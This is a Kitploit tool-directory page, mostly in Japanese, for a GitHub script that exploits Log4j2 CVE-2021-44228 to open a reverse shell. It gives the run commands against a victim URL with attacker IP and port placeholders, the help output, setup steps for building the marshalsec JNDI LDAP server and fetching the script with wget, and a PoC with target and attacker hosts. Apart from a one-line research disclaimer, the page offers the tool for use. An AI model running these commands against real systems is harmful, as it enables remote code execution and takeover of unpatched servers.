Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Log4j2-CVE-2021-44228-revshell — Log4j2 CVE-2021-44228 revshell、もちろんクソだ!! | Kitploit
ツール/GitHubGitHub/faisalfs10x/log4j2-cve-2021-44228-revshell
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubfaisalfs10x/log4j2-cve-2021-44228-revshell

Log4j2-CVE-2021-44228-revshell

Log4j2 CVE-2021-44228 revshell、もちろんクソだ!!

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
18224年前未レビュー

Log4j2-CVE-2021-44228-revshell

使用方法

root@kitploit:~
リバースシェル用:
$~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]

脆弱性確認用:
$~ python3 Log4j2-revshell.py -M check -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort]

$~  python3 Log4j2-revshell.py -h
    usage: Log4j2-revshell.py [-h] -M MODE -u TARGET -l LHOST -p LPORT
                              [-hp HTTPPORT] [-V]

    Log4j2 CVE-2021-44228 Reverse Shell

    optional arguments:
      -h, --help            show this help message and exit
      -M MODE, --mode MODE  Mode: check | rev
      -u TARGET, --target TARGET
                            Target full URL, http://www.victimLog4j.xyz:8080
      -l LHOST, --lhost LHOST
                            Attacker IP for receive revshell
      -p LPORT, --lport LPORT
                            Attacker port for receive revshell
      -hp HTTPPORT, --httpport HTTPPORT
                            HTTP server port on attacker host, default is 8888
      -V, --version         show program's version number and exit

必要条件

root@kitploit:~
1. Marshalsec jndi.LDAPRefServer # こちらを参照, https://github.com/mbechler/marshalsec
2. Java 8 # Java 8はこちらから入手できます https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html,
   推奨:jdk-8u181-linux-x64.tar.gz [Java 1.8.0_181] のインストール
3. このスクリプト、Log4j2-revshell.py

TLDR; 手順ガイド

root@kitploit:~
$ Open browser and Download Java 8 from https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html 
  In Java SE Development Kit 8u181 section, select jdk-8u181-linux-x64.tar.gz or appropriate package based on your OS.
    
$ sudo mkdir /usr/lib/jvm #まだこのディレクトリがない場合は作成します
$ cd /usr/lib/jvm
$ sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz #ダウンロードしたjdk-8u181-linux-x64.tar.gzを/usr/lib/jvmに展開
$ sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
$ sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
$ sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1

$ sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
$ sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
$ sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws
$ java -version #Java 1.8.0_181が実行されているか確認

$ git clone https://github.com/mbechler/marshalsec /tmp/Log4j2-dir; cd /tmp/Log4j2-dir #marshalsec jndi.LDAPRefServerをインストール
$ sudo apt install -y maven #Javaビルダーmavenを使ってmarshalsecをビルド。mavenがなければ先にインストールしてください
$ mvn clean package -DskipTests #mavenでmarshalsecツールをビルド
$ cd /tmp/Log4j2-dir; wget -q https://raw.githubusercontent.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell/main/Log4j2-revshell.py

$ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]

PoC

root@kitploit:~
ターゲットホスト: http://192.168.5.122:8080
攻撃者ホスト: 192.168.5.120

https://user-images.githubusercontent.com/51811615/146068317-23af25f4-9e5b-42bb-960b-6775edd5be03.mp4

テスト環境

root@kitploit:~
- Ubuntu 18.04

免責事項:

root@kitploit:~
本スクリプトはセキュリティ分析および研究目的のみに使用され、不正行為に使用された場合の責任は負いません。
ツールをダウンロード